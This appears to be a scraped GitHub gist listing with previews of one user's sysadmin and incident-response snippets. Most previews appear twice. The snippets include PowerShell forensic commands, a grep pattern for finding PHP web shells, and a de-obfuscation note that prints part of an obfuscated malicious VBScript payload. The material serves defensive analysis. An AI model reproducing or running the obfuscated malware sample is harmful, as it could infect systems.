Brett CrazyLlama

## sqlite.ps1
<#
.SYNOPSIS
sqlite.ps1 - Install, run, and uninstall sqlite for all you hacky needs.
.OUTPUTS
Should be no outputs other than what is generated in the sqlite session.
.EXAMPLE
.\sqlite.ps1 - _Runs the script_
.NOTES
Underscores denote sarcasm
#>

## De-obfuscation_23.07.20.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CrazyLlama
                / De-obfuscation_23.07.20.md
            
            
              Last active
              July 23, 2020 19:40
            
          
    De-obfuscation 23/07/2020

The raw script malicious.vbs

Private Function BysqAEwmfD(zEx) : If Len(zEx) < 5 Then : a = "" : Exit Function : End If : Dim p : zEx = Mid(zEx,3,Len(zEx)-4) : For i=2 To Len(zEx) Step 2 : xehFDCC = Asc(Mid(zEx,i,1)) + 10 : If xehFDCC > 126 Then : xehFDCC = xehFDCC - 126 + 33 - 1 : End If : j=Chr(xehFDCC) : If j = "~" Then : j=" " : End If : p = p & j : Next : BysqAEwmfD = p : End Function : BnjBhzaGjEs = BysqAEwmfD("}H6Iv[7j~tci.[phYlt_nY9[/t*3rtH91hl[]W^j|[3EDXw`{[&YWj:|CvjInYN^([hZkk,bm[w$QI\[NhTlv_rYr[HvO}gtL0&tNY:W`bDb~t]i.[KhUlj_JY^[y$!9yevd*d|[{YBjN|u}/t+0Tt#:,_DcMt=jBWhi:a?:B[q\z_Vd~_(j+_oe3det_0ytmI>[rjatgj0WVi'aE:5[i\`_3d+_@jM_]eTd#tb3=tkik[(h=lX_:Y=[v$1DS[bmKJ]W,i3aJ|Q&>}Rt|tS0[tcjDWliXa_:)[(\j_=dl_Aj&_Yeqd\$'H+[r]/_(iaj^hUWujE_>eTd6?cd`\de,$"":x[YikY=hN_#fWj%_,e^d9tR3HtrvSj0WAilan:>[2ibY6v0t^0Itqj~W=iHa>:S[/\^_Ldi_Zj#_KepdU$uIz[:jkj{_cdC]\i=$=;}dpWdX-bK[fZ>te3ktZJ>h5k.[?t-0.tOj8WfiGaY:D[5\]_7df_UjZ_[e!dk$%I*[Gj<j__.dr]BiD$RIEj#WshijdM1^A[rd17olPW4_rbiW

  
## AD-details.ps1
<#
.SYNOPSIS
  Pull the following from the DC:
   # Local Time
   # Desktop settings
   # BIOS info
   # Installed hotfixes
   # Operating System Version Information
   # Local Users and owner
   # All services on local machine

## Bad_ips.py
#/usr/bin/python
# Lets get those evil IPS!
# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages
#
# Aggregation of bad IPs is what this is after, and that's what I'll make it do
#

import xml.etree.cElementTree as ET
import numpy as np
import sys

## HP_Removal.ps1
<#
.SYNOPSIS
  Uninstall HP Data Protector if it exists
.INPUTS
  Path for:
   # HP Data Protector
.OUTPUTS
  Console output - Currently
.NOTES
  Version:        1.0

## really_annoying_on_macs.sh
#!/bin/sh
say -v Karen "theee"
say -v Daniel "eeeeee"
say -v Alex "eeeeee"
say -v Tessa "eeeeee"

## test_network_connectivity.ps1
## Using Test-Connection, test connectivity to the internet using the following as subjects: ##
## 8.8.8.8
## http://google.com
## https://google.com
## Find and replace XXXX with your choice of internal DNS name :)
##

function UX-Pause {
	Write-Progress -Activity "Testing Connection" -SecondsRemaining 3
	Start-Sleep 1

## Check those capabilities
for filename in `ls -l . | awk '{print $9}'`; do getcap $filename; done

## gist:3af2994bd80744cad72cb0cb50147781
# Look for potentially bad stuff that's compressed to hide mysterious things - run this within documentroot's of web servers to find potential php shells (source: https://djlab.com/2010/09/finding-php-shell-scripts-and-php-exploits/)
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include=*.php*

# Print out processes in a nicer format to compare its shown source to actual source
ps -Ao pid,comm,cmd,lstart

# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that
pkill -U <user> -STOP || pkill -STOP -U <user> # Depeding on OS

# Deny processes CPU time - this is based on a process by process working order

## gist:e9c5a931c9b37fc2cf40d184e23a7c94
## Sources:
# https://www.dionach.com/blog/powershell-in-forensic-investigations
# https://www.sans.org/reading-room/whitepapers/critical/uncovering-indicators-compromise-ioc-powershell-event-logs-traditional-monitoring-tool-36352
# https://blogs.technet.microsoft.com/heyscriptingguy/2012/05/28/use-powershell-to-aid-in-security-forensics/

# Lists out all established TCP connections, you can also use netstat to list all connections regardless of status. Make sure you decide whether this is TCP or UDP you want to see and remove the parentheses
Get-NetTCPConnection –State Established
netstat -ano -p (TCP/UDP)

# List out all processes running on the server
	<#
	.SYNOPSIS
	sqlite.ps1 - Install, run, and uninstall sqlite for all you hacky needs.
	.OUTPUTS
	Should be no outputs other than what is generated in the sqlite session.
	.EXAMPLE
	.\sqlite.ps1 - _Runs the script_
	.NOTES
	Underscores denote sarcasm
	#>
	<#
	.SYNOPSIS
	Pull the following from the DC:
	# Local Time
	# Desktop settings
	# BIOS info
	# Installed hotfixes
	# Operating System Version Information
	# Local Users and owner
	# All services on local machine
	#/usr/bin/python
	# Lets get those evil IPS!
	# If you’re using Linux or BSD systems, check your favourite package repository for python-celementtree or py-celementtree packages
	#
	# Aggregation of bad IPs is what this is after, and that's what I'll make it do
	#

	import xml.etree.cElementTree as ET
	import numpy as np
	import sys
	<#
	.SYNOPSIS
	Uninstall HP Data Protector if it exists
	.INPUTS
	Path for:
	# HP Data Protector
	.OUTPUTS
	Console output - Currently
	.NOTES
	Version: 1.0
	#!/bin/sh
	say -v Karen "theee"
	say -v Daniel "eeeeee"
	say -v Alex "eeeeee"
	say -v Tessa "eeeeee"
	## Using Test-Connection, test connectivity to the internet using the following as subjects: ##
	## 8.8.8.8
	## http://google.com
	## https://google.com
	## Find and replace XXXX with your choice of internal DNS name :)
	##

	function UX-Pause {
	Write-Progress -Activity "Testing Connection" -SecondsRemaining 3
	Start-Sleep 1
	# Look for potentially bad stuff that's compressed to hide mysterious things - run this within documentroot's of web servers to find potential php shells (source: https://djlab.com/2010/09/finding-php-shell-scripts-and-php-exploits/)
	grep '((eval.(base64_decode\|gzinflate\|\$_))\|\$[0O]{4,}\|FilesMan\|JGF1dGhfc\|IIIl\|die\(PHP_OS\|posix_getpwuid\|Array\(base64_decode\|document\.write\("\\u00\|sh(3(ll\|11)))' . -lroE --include=.php*

	# Print out processes in a nicer format to compare its shown source to actual source
	ps -Ao pid,comm,cmd,lstart

	# Deny those damn pesky processes their CPU time - this is based on all the bad processes being under a single user. Don't run this unless you're sure that
	pkill -U <user> -STOP \|\| pkill -STOP -U <user> # Depeding on OS

	# Deny processes CPU time - this is based on a process by process working order
	## Sources:
	# https://www.dionach.com/blog/powershell-in-forensic-investigations
	# https://www.sans.org/reading-room/whitepapers/critical/uncovering-indicators-compromise-ioc-powershell-event-logs-traditional-monitoring-tool-36352
	# https://blogs.technet.microsoft.com/heyscriptingguy/2012/05/28/use-powershell-to-aid-in-security-forensics/

	# Lists out all established TCP connections, you can also use netstat to list all connections regardless of status. Make sure you decide whether this is TCP or UDP you want to see and remove the parentheses
	Get-NetTCPConnection –State Established
	netstat -ano -p (TCP/UDP)

	# List out all processes running on the server